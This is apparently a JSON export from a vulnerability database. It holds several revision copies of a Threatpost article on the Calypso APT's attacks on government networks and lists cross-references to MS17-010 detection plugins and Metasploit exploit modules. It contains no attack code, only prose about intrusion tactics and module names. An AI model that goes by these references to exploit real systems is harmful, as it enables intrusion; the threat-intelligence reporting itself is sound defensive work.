["CVE-2017-11882", "CVE-2017-0146", "CVE-2017-0147"]}, {"type": "attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-101757", "SMNTC-96707"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "fireeye", "idList": ["FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "myhack58", "idList": ["MYHACK58:62201892510", "MYHACK58:62201892253"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0147"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "threatpost", "idList": ["THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:D1926084C0FE408F42D77D95C906E960", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:0425B921571C93D16403B41C928D6EE4", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:1109584452DBA30B86EF68E3277D4E39"]}], "modified": "2018-10-06T22:53:49", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "02cf3e03d7cf732490d89cdc2b4a219a", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) or by using stolen credentials. Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts a further payloads in the form of a Windows batch script (BAT) for installation. The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T18:55:02", "modified": "2019-10-31T18:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143"], "lastseen": "2020-04-09T11:37:03", "history": [{"bulletin": {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "02cf3e03d7cf732490d89cdc2b4a219a", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) or by using stolen credentials. Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts a further payloads in the form of a Windows batch script (BAT) for installation. The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T18:55:02", "modified": "2019-10-31T18:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143"], "lastseen": "2019-10-31T19:05:14", "history": [], "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2019-10-31T19:05:14"}, "score": {"value": 7.0, "vector": "NONE", "modified": "2019-10-31T19:05:14"}}, "objectVersion": "1.4"}, "lastseen": "2019-10-31T19:05:14", "differentElements": ["modified", "published"], "edition": 1}, {"bulletin": {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "144a81444c294a319259cd5721fdb200", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) or by using stolen credentials. Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts a further payloads in the form of a Windows batch script (BAT) for installation. The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T19:55:02", "modified": "2019-10-31T19:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143"], "lastseen": "2019-11-03T20:04:56", "history": [], "viewCount": 34, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2019-11-03T20:04:56"}, "score": {"value": 7.0, "vector": "NONE", "modified": "2019-11-03T20:04:56"}}, "objectVersion": "1.4"}, "lastseen": "2019-11-03T20:04:56", "differentElements": ["cvelist"], "edition": 2}, {"bulletin": {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "6dab50944b149965a74c3c298ee15f60", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) or by using stolen credentials. Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts a further payloads in the form of a Windows batch script (BAT) for installation. The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell 